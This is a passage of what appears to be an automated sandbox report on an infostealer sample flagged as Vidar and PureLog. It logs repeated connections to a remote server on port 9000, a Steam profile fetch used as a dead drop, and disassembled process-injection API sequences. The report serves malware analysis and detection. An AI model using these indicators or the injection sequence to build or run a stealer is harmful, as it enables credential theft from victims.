                                                                                                                                                                                              May 7, 2024 05:29:07.652302027 CEST90004974365.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:07.652350903 CEST497439000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:07.652781963 CEST497439000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:07.654341936 CEST497439000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:07.656142950 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:07.838047981 CEST90004974365.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:07.838121891 CEST497439000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:07.843316078 CEST90004974465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:07.843381882 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:07.843698025 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.027322054 CEST90004974465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.027677059 CEST90004974465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.027721882 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.028009892 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.029522896 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.031160116 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.213352919 CEST90004974465.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.213419914 CEST497449000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.214413881 CEST90004974565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.214487076 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.214759111 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.398130894 CEST90004974565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.398566961 CEST90004974565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.398627043 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.417517900 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.418878078 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.420193911 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.602621078 CEST90004974565.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.602679968 CEST497459000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.603940010 CEST90004974665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.604008913 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.604314089 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.788058043 CEST90004974665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.788249969 CEST90004974665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:08.788326025 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.904376030 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.905720949 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:08.907541037 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:09.089453936 CEST90004974665.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:09.089498043 CEST497469000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:09.091391087 CEST90004974765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:09.091454983 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:09.092389107 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:09.276171923 CEST90004974765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:09.276427031 CEST90004974765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:09.276490927 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.579535007 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.580873966 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.586704016 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.764650106 CEST90004974765.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:10.764734983 CEST497479000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.772356987 CEST90004974865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:10.772454023 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.772761106 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.958209991 CEST90004974865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:10.958436012 CEST90004974865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:10.958497047 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.958791971 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:10.960310936 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:29:11.145930052 CEST90004974865.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:29:11.146094084 CEST497489000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:30:17.201383114 CEST90004974265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:30:17.201406002 CEST90004974265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:30:17.201642990 CEST497429000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:30:44.025564909 CEST497429000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:30:44.025564909 CEST497429000192.168.2.465.108.152.56
                                                                                                                                                                                              May 7, 2024 05:30:44.212171078 CEST90004974265.108.152.56192.168.2.4
                                                                                                                                                                                              May 7, 2024 05:30:44.212402105 CEST497429000192.168.2.465.108.152.56

                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              May 7, 2024 05:28:54.095249891 CEST5537453192.168.2.41.1.1.1
                                                                                                                                                                                              May 7, 2024 05:28:54.181236029 CEST53553741.1.1.1192.168.2.4

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              May 7, 2024 05:28:54.095249891 CEST192.168.2.41.1.1.10xa13aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              May 7, 2024 05:28:54.181236029 CEST1.1.1.1192.168.2.40xa13aNo error (0)steamcommunity.com104.105.90.131A (IP address)IN (0x0001)false
                                                                                                                                                                                              May 7, 2024 05:28:55.456705093 CEST1.1.1.1192.168.2.40x10a7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                              May 7, 2024 05:28:55.456705093 CEST1.1.1.1192.168.2.40x10a7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                              • steamcommunity.com

                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449731104.105.90.1314435816C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-05-07 03:28:54 UTC119OUTGET /profiles/76561199680449169 HTTP/1.1
                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              2024-05-07 03:28:54 UTC1882INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Date: Tue, 07 May 2024 03:28:54 GMT
                                                                                                                                                                                              Content-Length: 35663
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: sessionid=cbda57a1813e582b31fe89fa; Path=/; Secure; SameSite=None
                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C3c9fb2dce0904d04a144dbc58052f440; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                              2024-05-07 03:28:54 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                              2024-05-07 03:28:54 UTC10074INData Raw: 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                              Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a>
                                                                                                                                                                                              2024-05-07 03:28:54 UTC11087INData Raw: 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53
                                                                                                                                                                                              Data Ascii: &quot;FROM_WEB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,&quot;S


                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:05:28:52
                                                                                                                                                                                              Start date:07/05/2024
                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                                              File size:358'000 bytes
                                                                                                                                                                                              MD5 hash:B9773393891D9CC471CD58CAC09052DD
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                              Start time:05:28:52
                                                                                                                                                                                              Start date:07/05/2024
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                              Imagebase:0x7e0000
                                                                                                                                                                                              File size:65'440 bytes
                                                                                                                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:13.2%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                Signature Coverage:33.3%
                                                                                                                                                                                                Total number of Nodes:18
                                                                                                                                                                                                Total number of Limit Nodes:0

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 02D69741 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02D698B0
                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D698C3
                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02D698E1
                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02D69905
                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02D69930
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02D69988
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02D699D3
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02D69A11
                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D69A4D
                                                                                                                                                                                                • ResumeThread.KERNELBASE(?), ref: 02D69A5C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631357172.0000000002D69000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D69000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d69000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                • API String ID: 2687962208-977067982
                                                                                                                                                                                                • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                • Instruction ID: 0f19e0b8d4d94e13b1255ad163cdef8e1bd92cd832caaea2c5ff34e11798389e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                • Instruction Fuzzy Hash: A5B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB341D774FA41CB94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D20C38 Relevance: 8.2, Strings: 6, Instructions: 706COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 23 2d20c38-2d20c6a 25 2d20c70-2d20c84 23->25 26 2d210e8-2d21106 23->26 27 2d20c86 25->27 28 2d20c8b-2d20d0e 25->28 30 2d21513-2d2151f 26->30 27->28 56 2d20d10-2d20d14 28->56 57 2d20d1a-2d20d6e 28->57 32 2d21114-2d21120 30->32 33 2d21525-2d21539 30->33 35 2d21500-2d21505 32->35 36 2d21126-2d211a6 32->36 43 2d21510 35->43 54 2d211a8-2d211ae 36->54 55 2d211be-2d211d7 36->55 43->30 58 2d211b2-2d211b4 54->58 59 2d211b0 54->59 62 2d21207-2d21245 55->62 63 2d211d9-2d21202 55->63 56->57 81 2d20d74-2d20d7c 57->81 82 2d2102a-2d2104e 57->82 58->55 59->55 75 2d21247-2d21268 62->75 76 2d2126a-2d21277 62->76 63->43 85 2d2127e-2d21284 75->85 76->85 83 2d20d83-2d20d8b 81->83 84 2d20d7e-2d20d82 81->84 92 2d210d2-2d210d8 82->92 88 2d20d90-2d20db2 83->88 89 2d20d8d 83->89 84->83 90 2d212a3-2d212f5 85->90 91 2d21286-2d212a1 85->91 99 2d20db7-2d20dbd 88->99 100 2d20db4 88->100 89->88 123 2d21410-2d2144f 90->123 124 2d212fb-2d21300 90->124 91->90 96 2d210e5 92->96 97 2d210da 92->97 96->26 97->96 102 2d20dc3-2d20ddd 99->102 103 2d20f97-2d20fa2 99->103 100->99 107 2d20ddf-2d20de3 102->107 108 2d20e1d-2d20e26 102->108 105 2d20fa7-2d20ff1 call 2d20138 103->105 106 2d20fa4 103->106 168 2d20ff3-2d2101d 105->168 169 2d2101f-2d21024 105->169 106->105 107->108 111 2d20de5-2d20ded 107->111 109 2d20e2c-2d20e3c 108->109 110 2d210cd 108->110 109->110 113 2d20e42-2d20e53 109->113 110->92 115 2d20df3 111->115 116 2d20e76-2d20e9f 111->116 113->110 118 2d20e59-2d20e69 113->118 122 2d20df6-2d20df8 115->122 119 2d20ea1-2d20eb4 116->119 120 2d20eba-2d20f2f 116->120 118->110 125 2d20e6f-2d20e74 118->125 119->120 144 2d21053-2d21067 120->144 145 2d20f35-2d20f39 120->145 127 2d20dfa 122->127 128 2d20dfd-2d20e08 122->128 148 2d21451-2d21469 123->148 149 2d2146b-2d2147a 123->149 132 2d2130a-2d2130d 124->132 125->116 127->128 128->110 129 2d20e0e-2d20e19 128->129 129->122 131 2d20e1b 129->131 131->116 135 2d21313 132->135 136 2d213d8-2d21400 132->136 139 2d2131a-2d21346 135->139 140 2d213aa-2d213d6 135->140 141 2d2134b-2d21377 135->141 142 2d2137c-2d213a8 135->142 147 2d21406-2d2140a 136->147 139->147 140->147 141->147 142->147 144->110 146 2d21069-2d21083 144->146 145->144 150 2d20f3f-2d20f4d 145->150 146->110 155 2d21085-2d210a2 146->155 147->123 147->132 158 2d21483-2d214e5 148->158 149->158 151 2d20f4f 150->151 152 2d20f8d-2d20f91 150->152 160 2d20f55-2d20f57 151->160 152->102 152->103 155->110 161 2d210a4-2d210c2 155->161 172 2d214f0-2d214fe 158->172 162 2d20f61-2d20f7d 160->162 163 2d20f59-2d20f5d 160->163 161->110 165 2d210c4 161->165 162->110 167 2d20f83-2d20f8b 162->167 163->162 165->110 167->152 167->160 168->169 169->82 172->43
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'kq$TJpq$TJpq$Tekq$poq$xbnq
                                                                                                                                                                                                • API String ID: 0-958120308
                                                                                                                                                                                                • Opcode ID: 0a8e940ccb7ad48b4a1177a5e0a10dd7d60996b01f33ec85b6c88c8348a5d8aa
                                                                                                                                                                                                • Instruction ID: 77ce5120a31c10b8a421fa2b37444d4a85757030f38e62e7789cbed4582c51e9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a8e940ccb7ad48b4a1177a5e0a10dd7d60996b01f33ec85b6c88c8348a5d8aa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2552F475A001249FCB15DF68C984A59BBB2FF98304F1585A8E11AAB376CB31EC95CF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D226B0 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 176 2d226b0-2d22712 178 2d22722-2d22761 CreateRemoteThread 176->178 179 2d22714-2d22720 176->179 180 2d22763-2d22769 178->180 181 2d2276a-2d2277e 178->181 179->178 180->181
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,?,?,?,00000000,?,?), ref: 02D22754
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateRemoteThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4286614544-0
                                                                                                                                                                                                • Opcode ID: 54efad0c5961a0a2aa060cbffe7be774a7bdb642a75375b2097e8c04d819555a
                                                                                                                                                                                                • Instruction ID: c43060055edb8c798cd503a5344f149c140cd8ec79d22274712180a6c947c583
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54efad0c5961a0a2aa060cbffe7be774a7bdb642a75375b2097e8c04d819555a
                                                                                                                                                                                                • Instruction Fuzzy Hash: E23110B5900249EFCB10CFA9D984ADEBFF0FB48314F20842AE958A7310D375A954CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D226B8 Relevance: 1.6, APIs: 1, Instructions: 66threadinjectionCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 183 2d226b8-2d22712 185 2d22722-2d22761 CreateRemoteThread 183->185 186 2d22714-2d22720 183->186 187 2d22763-2d22769 185->187 188 2d2276a-2d2277e 185->188 186->185 187->188
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,?,?,?,00000000,?,?), ref: 02D22754
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateRemoteThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4286614544-0
                                                                                                                                                                                                • Opcode ID: 78bc15835a9e4915fa38201cecc184a765d9c2e7c9e9141f5a1d6848cb0b2f78
                                                                                                                                                                                                • Instruction ID: 158e8cbf8c4dcd9639cb0177da501975ef96b6e5f5090be66532cb010eb0174a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 78bc15835a9e4915fa38201cecc184a765d9c2e7c9e9141f5a1d6848cb0b2f78
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F2103B5900249DFCB10CF9AD984ADEBBF4FF48314F20842AE958A7350D375A954CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D225E8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 190 2d225e8-2d22676 VirtualProtect 192 2d22678-2d2267e 190->192 193 2d2267f-2d226a0 190->193 192->193
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D22669
